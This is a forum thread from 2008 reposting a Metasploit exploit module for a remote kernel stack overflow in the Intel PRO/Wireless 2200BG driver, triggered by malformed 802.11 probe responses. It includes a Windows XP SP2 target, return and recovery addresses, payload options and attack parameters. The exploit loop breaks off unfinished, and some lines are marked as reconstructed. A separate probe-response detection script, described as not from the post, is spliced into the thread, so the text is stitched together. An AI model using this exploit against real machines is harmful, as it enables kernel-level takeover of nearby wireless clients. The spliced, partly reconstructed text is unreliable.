51CTO Tech Forum » Network Security
Title: [Repost] Taking over your system remotely over wireless: the Intel wireless card vulnerability  (Views: 152  Replies: 3)
 
SimpleLove (deputy moderator)
Posted: 2008-4-22 08:29   Subject: Taking over your system remotely over wireless: the Intel wireless card vulnerability
Intel - PRO/Wireless 2200BG Network Connection. I'd guess a lot of machines have this model of wireless card, so go upgrade right away..
http://www.milw0rm.com/exploits/5461

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
# Class header and initialize() reconstructed: the repost dropped the text between "<" and ">".
class Exploits::Windows::Driver::Intel_Centrino_2200BG_driver_probe < Msf::Exploit::Remote

include Exploit::Lorcon

def initialize(info = {})
super(update_info(info,
'Name' => 'Intel Centrino 2200BG Wireless Driver Probe Overflow',
'Description' => %q{
This module exploits a stack overflow in the w22n51.sys driver provided
with the Intel 2200BG integrated wireless adapter. This stack overflow
allows remote code execution in kernel mode. The stack overflow is triggered
when an 802.11 Probe response frame is received that contains multiple vendor specific tags
and "\x00" as essid and essid length element. This exploit was tested with version 8.0.12.20000
of the driver and an Intel Centrino 2200BG integrated wireless adapter. Newer
versions of the w22n51.sys driver are provided from Intel to resolve this flaw.
Since this vulnerability is exploited via probe response frames, all cards within
range of the attack will be affected.

Vulnerable clients don't need to have their card in a particular state for this exploit
to work.

This module depends on the Lorcon library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon documentation
(external/ruby-lorcon/README) for more information.
},

'Author' =>
[
'oveRet \'Giuseppe Gottardi\'', # the author's contact address was dropped in the repost
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 4529 $',
'References' =>
[
['URL', 'http://www.kb.cert.org/vuls/id/524332'],
['URL', 'http://www.milw0rm.org/exploits/3158'],
['URL', 'http://overet.securitydate.it/stuff/2200BG_8.0.12.20000_drivers.zip']
],
'Privileged' => true,

'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},

'Payload' =>
{
'Space' => 224
},
'Platform' => 'win',
'Targets' =>
[
# Windows XP SP2
# 5.1.2600 (xpsp_sp2_gdr.070227-2254)
[ 'Windows XP SP2 (5.1.2600), w22n51.sys 8.0.12.20000',
{
'Ret' => 0x8054eb62,
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook', # don't change this
'PrependUser' => "\xeb\x02" + # required jump
"\x85\xe0", # fixed max len
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dbb27,
}
}
}
]
],

'DefaultTarget' => 0
))

register_options(
[
OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
OptInt.new('RUNTIME', [ true, "The number of times to run the attack", 1000]),
OptInt.new('DELAY', [ true, "The number of seconds to sleep between the packets", 1]),
], self.class)
end

def exploit
open_wifi

rtime = datastore['RUNTIME'].to_i
dtime = datastore['DELAY'].to_i
count = 0

print_status("Sending probe exploit to #{datastore['ADDR_DST']}...")
print "[-] "

while (count < rtime) # comparison reconstructed; the repost dropped the text after "<"
# The repost ends here: the loop body that builds and injects the frames is not included.
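Added example, not from the forum post, Metasploit or Intel: a small Ruby walker over the tagged parameters (information elements) of a probe-response body that flags the frame shape the module description names, an empty SSID element next to several vendor-specific elements, the kind of check a capture-review or WIDS script would run. The 12-byte fixed-header offset and the vendor-element threshold are assumptions.

```ruby
# Added example: a minimal 802.11 information-element (IE) walker for a
# probe-response body, flagging the shape the module description names:
# an empty SSID element beside several vendor-specific (0xDD) elements.
# Not from the forum post or Metasploit; threshold and offsets are assumptions.

SSID_TAG       = 0x00
VENDOR_TAG     = 0xDD
FIXED_LEN      = 12   # timestamp (8) + beacon interval (2) + capability (2)
MAX_VENDOR_IES = 2    # assumed threshold for "multiple" vendor tags

# Walk the tagged parameters that follow the fixed part of the body.
# Returns an array of [tag, value] pairs, or nil when an element's declared
# length runs past the end of the buffer (a malformed frame).
def parse_ies(body)
  body = body.b                      # treat the frame as raw bytes
  ies = []
  off = FIXED_LEN
  while off < body.bytesize
    return nil if off + 2 > body.bytesize          # header cut short
    tag, len = body.byteslice(off, 2).unpack('CC')
    return nil if off + 2 + len > body.bytesize    # value overruns buffer
    ies << [tag, body.byteslice(off + 2, len)]
    off += 2 + len
  end
  ies
end

# True when the body is malformed, or when an empty SSID element appears
# together with MAX_VENDOR_IES or more vendor-specific elements.
def suspicious_probe_response?(body)
  ies = parse_ies(body)
  return true if ies.nil?
  empty_ssid = ies.any? { |tag, val| tag == SSID_TAG && val.empty? }
  vendor_ies = ies.count { |tag, _| tag == VENDOR_TAG }
  empty_ssid && vendor_ies >= MAX_VENDOR_IES
end

# Constructed sample bodies (not captured traffic).
FIXED   = "\x00" * FIXED_LEN
BENIGN  = FIXED + "\x00\x04test" + "\x01\x01\x82" + "\xDD\x03\x00\x50\xF2"
SUSPECT = FIXED + "\x00\x00" + "\xDD\x03\x00\x50\xF2" + "\xDD\x03\x00\x10\x18"

if __FILE__ == $0
  puts "benign:  #{suspicious_probe_response?(BENIGN)}"
  puts "suspect: #{suspicious_probe_response?(SUSPECT)}"
end
```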
alexclover (technician)
Posted: 2008-4-22 09:39
What does this mean?
Aren't you going to explain a little?



csllff (newcomer)
Posted: 2008-4-22 10:22
What does this mean?
Aren't you going to explain a little?



queniao (deputy moderator)
Posted: 2008-4-22 10:42
Ruby Lorcon code; the driver has a stack overflow vulnerability.



Copyright©2005-2008 51CTO.COM  Powered by Discuz!